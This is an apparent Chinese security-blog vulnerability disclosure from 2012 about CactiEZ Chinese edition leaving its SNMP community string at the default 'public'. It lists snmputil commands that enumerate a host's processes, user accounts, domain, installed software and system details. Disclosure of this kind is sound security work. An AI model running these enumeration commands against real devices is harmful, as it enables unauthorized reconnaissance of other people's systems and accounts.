CactiEZ 中文版snmp默认团体名漏洞

南国利剑 2012-06-04 215012人围观 ,发现 4 个不明物体 漏洞

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。

如:

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2   //**进程列表

snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1   //**用户列表

snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0   //**域名

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2   //**安装的软件

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1   //**系统信息

更多精彩
相关推荐
发表评论

已有 4 条评论

取消
Loading...

南国利剑

这是一个神奇的马甲

660 文章数 0 评论数 1 关注者

特别推荐

文章目录

    文章目录

      推荐关注

      官方公众号

      聚焦企业安全

      活动预告

      填写个人信息

      姓名
      电话
      邮箱
      公司
      行业
      职位
      css.php